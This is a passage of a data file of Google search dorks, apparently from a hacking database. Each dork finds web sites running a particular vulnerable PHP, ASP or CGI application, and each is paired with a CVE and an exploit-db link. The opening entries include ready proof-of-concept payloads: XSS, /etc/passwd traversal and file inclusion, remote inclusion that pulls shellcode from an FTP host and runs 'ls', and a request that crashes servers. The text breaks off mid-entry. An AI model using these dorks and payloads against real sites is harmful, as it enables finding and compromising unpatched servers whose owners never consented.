"inurl:perldiver.cgi ext:cgi", "description": "dork: inurl:perldiver.cgi ext:cgi some interesting info about server and a cross site scripting vulnerability, poc: http://[target]/[path]/cgi-bin/perldiver.cgi?action=20&alert(\"lol\")other reference:http://secunia.com/advisories/16888/"}, {"dork": "inurl:tmssql.php ext:php mssql pear adodb -cvs -akbk", "description": "dork:inurl:tmssql.php ext:php mssql pear adodb -cvs -akbka remote user can execute an arbitrary function (without arguments) example: http://[target]/[path]/tmssql.php?do=phpinfo reference:http://www.osvdb.org/displayvuln.php?osvdb_id=22291 I also discovered that you can crash some win boxes / apache servers by sendingmultiple requests of http://[target]/[path]/tmssql.php?do=closelogsee:http://www.milw0rm.com/exploits/1651"}, {"dork": "\"powered by php photo album\" | inurl:\"main.php?cmd=album\" -demo2 -pitanje", "description": "dork: \"powered by php photo album\" | inurl:\"main.php?cmd=album\" -demo2 -pitanje poc: if register_globals = On & magic_quotes_gpc = Off http://[target]/[path]/language.php?data_dir=/etc/passwd%00 on, php5, if register_globals = on: http://[target]/[path]/language.php?cmd=ls%20-la&data_dir=ftp://Anonymous:fakemail.com@somehost.com/public/ where on ftp you have a translation.dat file with shellcode inside references: http://retrogod.altervista.org/phpalbum_0323_incl_xpl.html http://www.securityfocus.com/bid/17526"}, {"dork": "\"powered by active php bookmarks\" | inurl:bookmarks/view_group.php?id=", "description": "Active PHP Bookmarks, a web based bookmark manager, was originally developed by Brandon Stone. Due to lack of time he has withdrawn himself from the project, however keeping his development forum on-line. On December 3rd 2004 this APB-forum, which was still the home of a small but relatively active community, was compromised. All content of the forum was lost, including links to important user contributed patches for the APB code.exploit (i haven't tested it)http://www.securityfocus.com/archive/1/305392my version of exploithttp://fr0zen.no-ip.org/apbn-0.2.5_remote_incl_xpl.phps"}, {"dork": "inurl:resetcore.php ext:php", "description": "e107 is a content management system written in php and using the popular open source mySQL database system for content storage. It's completely free and totally customisable, and in constant development.rgods exploit:http://retrogod.altervista.org/e107remote.html"}, {"dork": "intext:\"This site is using phpGraphy\" | intitle:\"my phpgraphy site\"", "description": "found this: a remote user can have access to some edit functionalities to \"modify\" html. Impact: cross site scripting, denial of service references:http://retrogod.altervista.org/phpgraphy_0911_adv.htmlhttp://secunia.com/advisories/19705"}, {"dork": "intext:\"Powered by PCPIN.com\" -site:pcpin.com -ihackstuff -\"works with\" -findlaw", "description": "this is for PCPIN Chat SQL injection/login bypass and arbitrary local inclusion references:http://retrogod.altervista.org/pcpin_504_xpl.htmlhttp://secunia.com/advisories/19708/"}, {"dork": "inurl:wp-login.php +Register Username Password \"remember me\" -echo -trac -footwear", "description": "this is a bit different from the previous one in GHDB, it searches for Wordpress 2.x sites where user registration is enabled, a user can inject a carriage return and php code inside cache files to have a shell on target systemadvisory & poc exploit here: http://retrogod.altervista.org/wordpress_202_xpl.html"}, {"dork": "\"powered by ubbthreads\"", "description": "forums powered by ubbthreads are vulnerable to file inclusion.You can get more results with yahoo search.http://site.com/ubbthredspath//ubbt.inc.php?thispath=http://shell.txt?http://www.securityfocus.com/archive/1/archive/1/435288/100/0/threaded"}, {"dork": "\"powered by minibb forum software\"", "description": "This dork is for minibb forum software arbitrary remote inclusion. this is about the unset() issue found by S. Esser: http://www.hardened-php.net/hphp/zend_hash_del_key_or_index_vulnerability.html Try this c codes to calculate hashes if you wanna test the unset() vuln on some other app: http://johnny.ihackstuff.com/index.php?name=PNphpBB2&file=viewtopic&t=3944"}, {"dork": "inurl:eStore/index.cgi?", "description": "this is for eStore directory traversal, example exploit:http://[target]/[path]/eStore/index.cgi?page=../../../../../../../../etc/passwd"}, {"dork": "allinurl:com_pccookbook", "description": "Joomla Component com_pccookbook (user_id) SQL Injection Vulnerability - CVE: 2008-0844: https://www.exploit-db.com/exploits/5145"}, {"dork": "inurl:\"section.php?name=singers\"", "description": "6rbScript 3.3 (section.php name) Local File Inclusion Vulnerability - CVE: 2008-6453: https://www.exploit-db.com/exploits/6520"}, {"dork": "Powered by v1.14 powered by philboard v1.14", "description": "W1L3D4 Philboard 1.2 (Blind SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2008-5192: https://www.exploit-db.com/exploits/5958"}, {"dork": "inurl:index.php%\"Submit%Articles\"%\"Member%Login\"%\"Top%Authors\"", "description": "Article Directory (index.php page) Remote File Inclusion Vulnerability - CVE: 2007-4007: https://www.exploit-db.com/exploits/4221"}, {"dork": "allinurl: \"wordspew-rss.php\"", "description": "Wordpress Plugin Wordspew Remote SQL Injection Vulnerability - CVE: 2008-0682: https://www.exploit-db.com/exploits/5039"}, {"dork": "allinurl: com_clasifier", "description": "Joomla Component com_clasifier (cat_id) SQL Injection Vulnerability - CVE: 2008-0842: https://www.exploit-db.com/exploits/5146"}, {"dork": "allinurl: \"com_galeria\"", "description": "Joomla Component com_galeria Remote SQL Injection Vulnerability - CVE: 2008-0833: https://www.exploit-db.com/exploits/5134"}, {"dork": "Powered by hwdVideoShare", "description": "Joomla Component com_hwdvideoshare SQL Injection Vulnerability - CVE: 2008-0916: https://www.exploit-db.com/exploits/5160"}, {"dork": "allinurl: modules-php-name-Siir", "description": "PHP-Nuke Module Siir (id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5169"}, {"dork": "inurl:\"jscripts/tiny_mce/plugins/tinybrowser/\"", "description": "inurl:\"jscripts/tiny_mce/plugins/tinybrowser/\"\r\n\r\n\r\n\r\nor refined\r\n\r\n\r\n\r\ninurl:\"jscripts/tiny_mce/plugins/tinybrowser/\" \"index of\"\r\n\r\n\r\n\r\nVarious \"tinybrowser\" vulnerabilities: \r\n\r\nhttps://www.exploit-db.com/exploits/9296/\r\n\r\n\r\n\r\nDigiP"}, {"dork": "allinurl: \"modules/wfdownloads/viewcat.php?cid\"", "description": "XOOPS Module wfdownloads (cid) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5218"}, {"dork": "allinurl: \"modules/eEmpregos/index.php\"", "description": "XOOPS Module eEmpregos (cid) Remote SQL Injection Vulnerability - CVE: 2008-0874: https://www.exploit-db.com/exploits/5157"}, {"dork": "Powered by Active PHP Bookmarks v1.1.02", "description": "Active PHP Bookmarks 1.1.02 Remote SQL Injection Vulnerability - CVE: 2008-3748: https://www.exploit-db.com/exploits/6277"}, {"dork": "powered by Site Sift", "description": "Site Sift Listings (id) Remote SQL Injection Vulnerability - CVE: 2008-1869: https://www.exploit-db.com/exploits/5383"}, {"dork": "\"Create your own free webring and bring traffic to your website. Join now, it's free!\"", "description": "Prozilla Webring Website Script (category.php cat) Remote SQL Injection - CVE: 2007-4362: https://www.exploit-db.com/exploits/4284"}, {"dork": "inurl:com_joomladate", "description": "Joomla Component JoomlaDate (user) SQL injection Vulnerability - CVE: 2008-6068: https://www.exploit-db.com/exploits/5748"}, {"dork": "\"powered by ILIAS\"", "description": "ILIAS 3.7.4 (ref_id) Blind SQL Injection Vulnerability - CVE: 2008-5816: https://www.exploit-db.com/exploits/7570"}, {"dork": "allinurl: \"index.php?option=com_doc\"", "description": "Joomla Component com_doc Remote SQL Injection Vulnerability - CVE: 2008-0772: https://www.exploit-db.com/exploits/5080"}, {"dork": "Powered by GL-SH DEAF forum 6.5.5 final.", "description": "PHP Forum ohne My SQL Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/10757"}, {"dork": "inurl:com_simpleshop", "description": "Joomla Component simpleshop 3.4 SQL injection Vulnerability - CVE: 2008-2568: https://www.exploit-db.com/exploits/5743"}, {"dork": "inurl:\"index.php?pageid=\" Property Listings", "description": "Realtor 747 (index.php categoryid) Remote SQL Injection Vulnerbility - CVE: 2007-3810: https://www.exploit-db.com/exploits/4184"}, {"dork": "\"Powered by Smoothflash\"", "description": "Smoothflash (admin_view_image.php cid) SQL Injection Vulnerability - CVE: 2008-1623: https://www.exploit-db.com/exploits/5322"}, {"dork": "display_blog.php", "description": "Social Site Generator (sgc_id) Remote SQL Injection Vulnerability - CVE: 2008-6419: https://www.exploit-db.com/exploits/5701"}, {"dork": "Snipe Gallery v.3.1.5 by Snipe.Net", "description": "snipe gallery Script Sql Injection: https://www.exploit-db.com/exploits/14053"}, {"dork": "Powered by AspDownload", "description": "ASP Download 1.03 Arbitrary Change Administrator Account Vulnerability - CVE: 2008-6739: https://www.exploit-db.com/exploits/5780"}, {"dork": "DA Mailing List System V2 Powered by DigitalArakan.Net", "description": "DA Mailing List System V2 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/11348"}, {"dork": "Powered By AJ Auction Web", "description": "AJ Auction Web 2.0 (cate_id) SQL Injection Vulnerability - CVE: 2008-2860: https://www.exploit-db.com/exploits/5867"}, {"dork": "''showad.php?listingid=''", "description": "BM Classifieds 20080409 Multiple SQL Injection Vulnerabilities - CVE: 2008-1272: https://www.exploit-db.com/exploits/5223"}, {"dork": "\"Powered by My PHP Indexer 1.0\"", "description": "My PHP Indexer 1.0 (index.php) Local File Download Vulnerability - CVE: 2008-6183: https://www.exploit-db.com/exploits/6740"}, {"dork": "allinurl: \"com_rapidrecipe\"user_id", "description": "Joomla Component rapidrecipe 1.6.5 SQL Injection Vulnerability - CVE: 2008-0754: https://www.exploit-db.com/exploits/5103"}, {"dork": "allinurl: \"modules/dictionary\"", "description": "XOOPS Module Dictionary 0.94 Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5267"}, {"dork": "\"RS MAXSOFT\"", "description": "RX Maxsoft (popup_img.php fotoID) Remote SQL Injection Vulnerability - CVE: 2008-4912: https://www.exploit-db.com/exploits/5426"}, {"dork": "\"2007 RADIOZAZA www.radiozaza.de? istek hatti Version 2.5\"", "description": "Radio istek scripti 2.5 Remote Configuration Disclosure Vulnerability - CVE: 2009-4096: https://www.exploit-db.com/exploits/10231"}, {"dork": "allinurl: \"index.php?p=poll\"showresult", "description": "Koobi Pro 6.25 poll Remote SQL Injection Vulnerability - CVE: 2008-2036: https://www.exploit-db.com/exploits/5448"}, {"dork": "allinurl: \"com_joovideo\" detail", "description": "Joomla Component joovideo 1.2.2 (id) SQL Injection Vulnerability - CVE: 2008-1460: https://www.exploit-db.com/exploits/5277"}, {"dork": "content_by_cat.asp?contentid ''catid''", "description": "ASPapp Knowledge Base Remote SQL Injection Vulnerability - CVE: 2008-1430: https://www.exploit-db.com/exploits/5286"}, {"dork": "Powered By AlstraSoft Video Share Enterprise", "description": "AlstraSoft Video Share Enterprise 4.5.1 (UID) SQL Injection Vulnerability - CVE: 2008-3386: https://www.exploit-db.com/exploits/6092"}, {"dork": "\"Powered by PG Real Estate Solution - real estate web site design\"", "description": "PG Real Estate (Auth Bypass) SQL Injection Vulnerability - CVE: 2008-5306: https://www.exploit-db.com/exploits/7200"}, {"dork": "\"Powered by PG Roomate Finder Solution - roommate estate web site design\"", "description": "PG Roomate Finder Solution (Auth Bypass) SQL Injection Vulnerability - CVE: 2008-5307: https://www.exploit-db.com/exploits/7201"}, {"dork": "allinurl: com_pcchess \"user_id\"", "description": "Joomla Component pcchess 0.8 Remote SQL Injection Vulnerability - CVE: 2008-0761: https://www.exploit-db.com/exploits/5104"}, {"dork": "Powered by PHP upload - unijimpe.", "description": "PHP upload - (unijimpe) Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/10732"}, {"dork": "\"Powered by FubarForum v1.6\"", "description": "FubarForum 1.6 Arbitrary Admin Bypass Vulnerability: https://www.exploit-db.com/exploits/7595"}, {"dork": "inurl:cfaq/index.php?catid=", "description": "FAQ Management Script (catid) Remote SQL Injection Vulnerability - CVE: 2008-4743: https://www.exploit-db.com/exploits/6629"}, {"dork": "''name Kose_Yazilari op viewarticle artid''", "description": "PHP-Nuke Module Kose_Yazilari (artid) SQL Injection Vulnerability - CVE: 2008-1053: https://www.exploit-db.com/exploits/5186"}, {"dork": "inurl: modifyform.html?code=", "description": "modifyform (modifyform.html) Remote File Inclusion Vulnerability: https://www.exploit-db.com/exploits/4423"}, {"dork": "allinurl: com_ricette", "description": "Mambo Component Ricette 1.0 Remote SQL Injection Vulnerability - CVE: 2008-0841: https://www.exploit-db.com/exploits/5133"}, {"dork": "out.php?linkid=1", "description": "Link ADS 1 (out.php linkid) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5930"}, {"dork": "\" ActiveKB v1.5 Copyright \u00c2\u00a9\"", "description": "ActiveKB 1.5 Insecure Cookie Handling/Arbitrary Admin Access - CVE: 2008-2338: https://www.exploit-db.com/exploits/5616/"}, {"dork": "allinurl:\"com_garyscookbook\"", "description": "Mambo Component garyscookbook 1.1.1 SQL Injection Vulnerability - CVE: 2008-1137: https://www.exploit-db.com/exploits/5178"}, {"dork": "inurl:\"index.php?conteudo=\"", "description": "Waibrasil Remote / Local File Inclusion: https://www.exploit-db.com/exploits/12562"}, {"dork": "inurl:\"section.php?name=singers\"", "description": "6rbScript 3.3 (singerid) Remote SQL Injection Vulnerability - CVE: 2008-6454: https://www.exploit-db.com/exploits/6511"}, {"dork": "inurl:cat1.php?catID= \"Spaceacre\"", "description": "Spaceacre (index.php) SQL/HTML/XSS Injection Vulnerability: https://www.exploit-db.com/exploits/12756"}, {"dork": "\"Powered by FubarForum v1.6\"", "description": "FubarForum 1.6 Admin Bypass Change User Password Vulnerability: https://www.exploit-db.com/exploits/7606"}, {"dork": "intext:\u00c2\u00a92003-2008 RC v3.1 Developed by: GA Soft", "description": "Rapid Classified 3.1 (cldb.mdb) Database Disclosure Vulnerability - CVE: 2008-6388: https://www.exploit-db.com/exploits/7324"}, {"dork": "details.php?p_id=", "description": "The iceberg 'Content Management System' SQL Injection Vulnerability - CVE: 2010-2016: https://www.exploit-db.com/exploits/12620"}, {"dork": "allinurl:\"modules/photo/viewcat.php?id\"", "description": "RunCMS Module Photo 3.02 (cid) Remote SQL Injection Vulnerability - CVE: 2008-1551: https://www.exploit-db.com/exploits/5290"}, {"dork": "powered by 35mm Slide Gallery", "description": "35mm Slide Gallery Directory Traversal Vulnerability: https://www.exploit-db.com/exploits/10614"}, {"dork": "allinurl:\"com_simpleshop\"", "description": "Joomla Component simple shop 2.0 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5177"}, {"dork": "powered by vBulletin 3.8.4", "description": "vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability: https://www.exploit-db.com/exploits/14833"}, {"dork": "intitle:Web Calendar system v 3.30 inurl:.asp", "description": "Web Calendar System 3.12/3.30 Multiple Remote Vulnerabilities - CVE: 2004-1552: https://www.exploit-db.com/exploits/7242"}, {"dork": "inurl:index.php?page=en_jobseekers", "description": "JobSite Professional 2.0 file.php Remote SQL Injection Vulnerability - CVE: 2007-5785: https://www.exploit-db.com/exploits/4576"}, {"dork": "webwizguestbook_license.asp", "description": "Web Wiz Guestbook 8.21 (WWGguestbook.mdb) DD Vulnerability - CVE: 2003-1571: https://www.exploit-db.com/exploits/7488"}, {"dork": "allinurl: aid \"com_xfaq\"", "description": "Joomla Component xfaq 1.2 (aid) Remote SQL Injection Vulnerability - CVE: 2008-0795: https://www.exploit-db.com/exploits/5109"}, {"dork": "inurl:modules/flashgames/", "description": "XOOPS Flashgames Module 1.0.1 Remote SQL Injection Vulnerability - CVE: 2007-2543: https://www.exploit-db.com/exploits/3849"}, {"dork": "inurl:index.php?option=com_mediaslide", "description": "Joomla Component com_mediaslide Directory Traversal Vulnerability: https://www.exploit-db.com/exploits/10591"}, {"dork": "inurl:\"com_biblestudy\"", "description": "Joomla Component com_biblestudy LFI Vulnerability - CVE: 2010-0157: https://www.exploit-db.com/exploits/10943"}, {"dork": "inurl:\"com_dashboard\"", "description": "Joomla Component com_dashboard Directory Traversal: https://www.exploit-db.com/exploits/11086"}, {"dork": "inurl:\"com_jcollection \"", "description": "Joomla Component com_jcollection Directory Traversal - CVE: 2010-0944: https://www.exploit-db.com/exploits/11088"}, {"dork": "\"Affiliate Network Pro\"", "description": "AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability - CVE: 2008-3240: https://www.exploit-db.com/exploits/6087"}, {"dork": "index.php?option=com_pcchess", "description": "PrinceClan Chess Mambo Com 0.8 Remote Inclusion Vulnerability - CVE: 2006-5044: https://www.exploit-db.com/exploits/2069"}, {"dork": "Powered By: Forest Blog v1.3.2", "description": "Forest Blog 1.3.2 (blog.mdb) Remote Database Disclosure Vulnerability - CVE: 2008-5780: https://www.exploit-db.com/exploits/7466"}, {"dork": "intext:\"Powered by phpFastNews\"", "description": "phpFastNews 1.0.0 Insecure Cookie Handling Vulnerability - CVE: 2008-4622: https://www.exploit-db.com/exploits/6779"}, {"dork": "Powered by phpDatingClub", "description": "phpDatingClub (website.php page) Local File Inclusion Vulnerability - CVE: 2008-3179: https://www.exploit-db.com/exploits/6037"}, {"dork": "\"Powered by: Censura\"", "description": "Censura 1.15.04 (censura.php vendorid) SQL Injection Vulnerability - CVE: 2007-2673: https://www.exploit-db.com/exploits/3843"}, {"dork": "inurl:com_clanlist", "description": "Joomla Component (com_clanlist) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/15456"}, {"dork": "\"This script created by www.script.canavari.com\"", "description": "Basic Forum 1.1 (edit.asp) Remote SQL Injection Vulnerability - CVE: 2006-6193: https://www.exploit-db.com/exploits/2848"}, {"dork": "inurl:classified/product_desc.php?id=", "description": "GreenCart PHP Shopping Cart (id) Remote SQL Injection Vulnerability - CVE: 2008-3585: https://www.exploit-db.com/exploits/6189"}, {"dork": "allinurl:\"members.asp?action\"", "description": "MiniNuke 2.1 (members.asp uid) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5187"}, {"dork": "inurl:btg_oglas", "description": "Joomla Component (btg_oglas) HTML & XSS Injection Vulnerability: https://www.exploit-db.com/exploits/15468"}, {"dork": "Powered by lineaCMS \u00a9 2006 lineaPHP Group", "description": "lineaCMS Cross Site Scripting Vulnerability: https://www.exploit-db.com/exploits/10736"}, {"dork": "\"Powered by Scripteen Free Image Hosting Script V 2.3\"", "description": "Scripteen Free Image Hosting Script 2.3 Insecure Cookie Handling Vuln - CVE: 2009-4987: https://www.exploit-db.com/exploits/9256"}, {"dork": "inurl:\"com_jvideodirect \"", "description": "Joomla Component com_jvideodirect Directory Traversal - CVE: 2010-0942: https://www.exploit-db.com/exploits/11089"}, {"dork": "\"Siteman Version 1.1.9\"", "description": "Siteman 1.1.9 (cat) Remote File Disclosure Vulnerability - CVE: 2008-0452: https://www.exploit-db.com/exploits/4973"}, {"dork": "\"SimpleBlog 2.3 by 8pixel.net\"", "description": "SimpleBlog 2.3 (admin/edit.asp) Remote SQL Injection Vulnerability - CVE: 2006-6191: https://www.exploit-db.com/exploits/2853"}, {"dork": "inurl:/squirrelcart/", "description": "Squirrelcart 2.2.0 (cart_content.php) Remote Inclusion Vulnerability - CVE: 2006-2483: https://www.exploit-db.com/exploits/1790"}, {"dork": "inurl:com_markt", "description": "Joomla Component (com_markt) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/15469"}, {"dork": "\"powered by EQdkp\"", "description": "EQdkp 1.3.0 (dbal.php) Remote File Inclusion Vulnerability - CVE: 2006-2256: https://www.exploit-db.com/exploits/1764"}, {"dork": "intitle:\"Login to Calendar\"", "description": "ACal 2.2.6 (day.php) Remote File Inclusion Vulnerability - CVE: 2006-2261: https://www.exploit-db.com/exploits/1763"}, {"dork": "\"WebCalendar v1.0.4\"", "description": "WebCalendar 1.0.4 (includedir) Remote File Inclusion Vulnerability - CVE: 2008-2836: https://www.exploit-db.com/exploits/5847"}, {"dork": "inurl:\"com_bfsurvey\"", "description": "Joomla Component com_bfsurvey LFI Vulnerability - CVE: 2010-2259: https://www.exploit-db.com/exploits/10946"}, {"dork": "anyInventory, the most flexible and powerful web-based inventory system", "description": "AnyInventory 2.0 (environment.php) Remote File Inclusion Vuln - CVE: 2007-4744: https://www.exploit-db.com/exploits/4365"}, {"dork": "inurl:bemarket", "description": "BBS E-Market (postscript.php p_mode) Remote File Inclusion Vulnerability - CVE: 2007-3934: https://www.exploit-db.com/exploits/4195"}, {"dork": "inurl:\"com_jashowcase \"", "description": "Joomla Component com_jashowcase Directory Traversal - CVE: 2010-0943: https://www.exploit-db.com/exploits/11090"}, {"dork": "Powered by React - www.react.nl", "description": "React software [local file inclusion]: https://www.exploit-db.com/exploits/11943"}, {"dork": "\"qjForum\"", "description": "qjForum (member.asp) SQL Injection Vulnerability - CVE: 2006-2638: https://www.exploit-db.com/exploits/1833"}, {"dork": "\"Powered by cifshanghai.com\"", "description": "Cifshanghai (chanpin_info.php) CMS SQL Injection: https://www.exploit-db.com/exploits/10105"}, {"dork": "allinurl:\"detResolucion.php?tipodoc_id=\"", "description": "CMS Ariadna 2009 SQL Injection - OSVDB-ID: 63929: https://www.exploit-db.com/exploits/12301"}, {"dork": "\"Powered By : Yamamah Version 1.00\"", "description": "Yamamah Photo Gallery 1.00 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/13857"}, {"dork": "Powered by osCSS", "description": "osCSS v1.2.1 Database Backups Disclosure: https://www.exploit-db.com/exploits/11612"}, {"dork": "inurl:\"index.php?option=com_prime\"", "description": "Joomla Component com_prime Directory Traversal: https://www.exploit-db.com/exploits/11177"}, {"dork": "\"2006 by www.mani-stats-reader.de.vu\"", "description": "Mani Stats Reader 1.2 (ipath) Remote File Include Vulnerability - CVE: 2007-1299: https://www.exploit-db.com/exploits/3398"}, {"dork": "\"powered by: WebLeague\"", "description": "webLeague 2.2.0 (install.php) Remote Change Password: https://www.exploit-db.com/exploits/9164"}, {"dork": "\"All Rights Reserved. Powered by DieselScripts.com\"", "description": "Diesel Joke Site (picture_category.php id) SQL Injection Vulnerability - CVE: 2008-4150: https://www.exploit-db.com/exploits/6488"}, {"dork": "intitle:Web Calendar system v 3.40 inurl:.asp", "description": "Web Calendar System 3.40 (XSS/SQL) Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/7265"}, {"dork": "inurl:index.php?option=com_noticia", "description": "Joomla compnent com_noticia cross site scripting: https://www.exploit-db.com/exploits/10789"}, {"dork": "inurl:guestbook.php \"Advanced GuestBook\" \"powered by phpbb\"", "description": "Advanced GuestBook 2.4.0 (phpBB) File Inclusion Vulnerability - CVE: 2006-2152: https://www.exploit-db.com/exploits/1723"}, {"dork": "inurl:index.php?option=com_portfolio", "description": "Joomla Component com_portfolio Local File Disclosure: https://www.exploit-db.com/exploits/12325"}, {"dork": "allinurl:\"/ubbthreads/\"", "description": "UBB Threads 6.4.x-6.5.2 (thispath) Remote File Inclusion Vulnerability - CVE: 2006-2568: https://www.exploit-db.com/exploits/1814"}, {"dork": "\"powered by zomplog\"", "description": "Zomplog 3.8.2 (force_download.php) File Disclosure Vulnerability: https://www.exploit-db.com/exploits/5636"}, {"dork": "inurl:\"/cgi-bin/ourspace/\"", "description": "Ourspace 2.0.9 (uploadmedia.cgi) Remote File Upload Vulnerability - CVE: 2007-4647: https://www.exploit-db.com/exploits/4343"}, {"dork": "inurl:index.php?option=com_joomradio", "description": "Joomla Component com_joomradio SQL injection vulnerability - CVE: 2008-2633: https://www.exploit-db.com/exploits/12400"}, {"dork": "\"Powered by xeCMS\"", "description": "xeCMS 1.x (view.php list) Remote File Disclosure Vulnerability - CVE: 2007-6508: https://www.exploit-db.com/exploits/4758"}, {"dork": "Power by PHP Classifieds", "description": "Pre PHP Classifieds SQL Injection Vulnerability: https://www.exploit-db.com/exploits/13992"}, {"dork": "\"powered by clipshare\"", "description": "ClipShare 3.0.1 (tid) Remote SQL Injection Vulnerability - CVE: 2008-2793: https://www.exploit-db.com/exploits/5839"}, {"dork": "inurl:\"com_dailymeals\"", "description": "Joomla Component com_dailymeals LFI Vulnerability: https://www.exploit-db.com/exploits/10928"}, {"dork": "inurl:\"/k12.tr/?part=\"", "description": "Okul Otomasyon Portal 2.0 Remote SQL Injection Vulnerability - CVE: 2007-5490: https://www.exploit-db.com/exploits/4539"}, {"dork": "inurl:\"com_clan\"", "description": "Joomla Component (com_clan) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/15454"}, {"dork": "\"Powered by WSN Guest\"", "description": "WSN Guest Database Disclosure Vulnerability: https://www.exploit-db.com/exploits/11344"}, {"dork": "allinurl: com_paxxgallery \"userid\"", "description": "Joomla Component paxxgallery 0.2 (iid) SQL Injection Vulnerability - CVE: 2008-0801: https://www.exploit-db.com/exploits/5117"}, {"dork": "inurl:\"index2.php?option=rss\" OR \"powered By Limbo CMS\"", "description": "Limbo CMS 1.0.4.2 (sql.php) Remote File Inclusion Vulnerability - CVE: 2006-2142: https://www.exploit-db.com/exploits/1729"}, {"dork": "\"Powered by ezContents Version 1.4.5\"", "description": "ezContents 1.4.5 (index.php link) Remote File Disclosure Vulnerability - CVE: 2007-6368: https://www.exploit-db.com/exploits/4694"}, {"dork": "powered by CMSbright \u00c2\u00a9 websens", "description": "CMSbright (id_rub_page) Remote SQL Injection Vulnerability - CVE: 2008-6991: https://www.exploit-db.com/exploits/6343"}, {"dork": "allinurl: com_quiz\"tid\"", "description": "Joomla Component Quiz 0.81 (tid) SQL Injection Vulnerability - CVE: 2008-0799: https://www.exploit-db.com/exploits/5119"}, {"dork": "inurl:\"com_biographies\"", "description": "Joomla Component com_biographies SQL injection Vulnerability: https://www.exploit-db.com/exploits/11226"}, {"dork": "inurl\"com_gurujibook\"", "description": "Joomla Component com_gurujibook SQL injection Vulnerability: https://www.exploit-db.com/exploits/11225"}, {"dork": "inurl:/system/article/alltopics.php OR inurl:/system/user/index.php", "description": "OpenPHPNuke 2.3.3 Remote File Inclusion Vulnerability - CVE: 2006-2137: https://www.exploit-db.com/exploits/1727"}, {"dork": "Realizzato con WSC CMS by Dynamicsoft", "description": "WSC CMS (Bypass) SQL Injection Vulnerability - CVE: 2010-0698: https://www.exploit-db.com/exploits/11507"}, {"dork": "\"Powered by Knowledge Base\"", "description": "Knowledge Base Mod 2.0.2 (phpBB) Remote Inclusion Vulnerability - CVE: 2006-2134: https://www.exploit-db.com/exploits/1728"}, {"dork": "allinurl:\"com_extcalendar\"", "description": "Joomla Component com_extcalendar Blind SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14694"}, {"dork": "intitle:\"Jax Formmailer - Administration\"", "description": "Jax FormMailer 3.0.0 Remote File Inclusion Vulnerability - CVE: 2009-2378: https://www.exploit-db.com/exploits/9051"}, {"dork": "Powered by: Linkarity\u00e2", "description": "Linkarity (link.php) Remote SQL Injection Vulnerability - CVE: 2008-4353: https://www.exploit-db.com/exploits/6455"}, {"dork": "inurl:index.php?option=com_yanc", "description": "Mambo com_yanc 1.4 beta (id) Remote SQL Injection Vulnerability - CVE: 2007-2792: https://www.exploit-db.com/exploits/3944"}, {"dork": "allinurl: \"index.php?p=gallerypic img_id\"", "description": "Koobi Pro v6.1 gallery (img_id) - CVE: 2008-6210: https://www.exploit-db.com/exploits/10751"}, {"dork": "inurl:classified.php phpbazar", "description": "phpBazar 2.1.0 Remote (Include/Auth Bypass) Vulnerabilities - CVE: 2006-2527: https://www.exploit-db.com/exploits/1804"}, {"dork": "intext:\"Powered by Firebrand Technologies\"", "description": "CMS Firebrand Tec Local File Inclusion Vulnerability: https://www.exploit-db.com/exploits/12378"}, {"dork": "\"Designed and Developed by Debliteck Ltd\"", "description": "DB[CMS] (section.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12659"}, {"dork": "Supernews 2.6", "description": "Supernews 2.6 (index.php noticia) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/8869"}, {"dork": "\"powered by ezUserManager\"", "description": "ezUserManager 1.6 Remote File Inclusion Vulnerability - CVE: 2006-2424: https://www.exploit-db.com/exploits/1795"}, {"dork": "Powered by: PreProjects", "description": "Pre Multi-Vendor Shopping Malls (products.php?sid) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/13996"}, {"dork": "allintitle: \"MCgallery 0.5b\"", "description": "McGallery 0.5b (download.php) Arbitrary File Download Vulnerability - CVE: 2007-1478: https://www.exploit-db.com/exploits/3494"}, {"dork": "TRUC 0.11.0 :: \u00c2\u00a9 2006 by ASDIS :", "description": "RUC 0.11.0 (download.php) Remote File Disclosure Vulnerability - CVE: 2008-0814: https://www.exploit-db.com/exploits/5129"}, {"dork": "contact_frm.php", "description": "Recipes Website 1.0 SQL Injection - OSVDB-ID: 64841: https://www.exploit-db.com/exploits/12703"}, {"dork": "Powered by Natterchat v1.12", "description": "Natterchat 1.12 (Auth Bypass) Remote SQL Injection Vulnerability - CVE: 2008-7049: https://www.exploit-db.com/exploits/7175"}, {"dork": "\"Instant Free File Uploader\"", "description": "Uploaderr 1.0 - File Hosting Script Shell Upload Vulnerability: https://www.exploit-db.com/exploits/10241"}, {"dork": "Powered by Webiz inurl:'wmt/webpages", "description": "(Webiz) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12798"}, {"dork": "\"Powered by xchangeboard\"", "description": "XchangeBoard 1.70 (boardID) Remote SQL Injection Vulnerability - CVE: 2008-3035: https://www.exploit-db.com/exploits/5991"}, {"dork": "allinurl: com_mcquiz \"tid\"", "description": "Joomla Component MCQuiz 0.9 Final (tid) SQL Injection Vulnerability - CVE: 2008-0800: https://www.exploit-db.com/exploits/5118"}, {"dork": "inurl:\"com_productbook\"", "description": "Joomla Component com_productbook SQL Injection Vulnerability - CVE: 2010-1045: https://www.exploit-db.com/exploits/11352"}, {"dork": "inurl: \"com_alphacontent\"", "description": "Joomla Component alphacontent 2.5.8 (id) SQL Injection Vulnerability - CVE: 2008-1559: https://www.exploit-db.com/exploits/5310"}, {"dork": "\"Powered by: PreProjects\"", "description": "Pre Multi-Vendor Shopping Malls SQL Injection Vulnerability: https://www.exploit-db.com/exploits/13987"}, {"dork": "\"Powered by SoftbizScripts\" inurl:store_info.php", "description": "Softbiz Classifieds PLUS (id) Remote SQL Injection 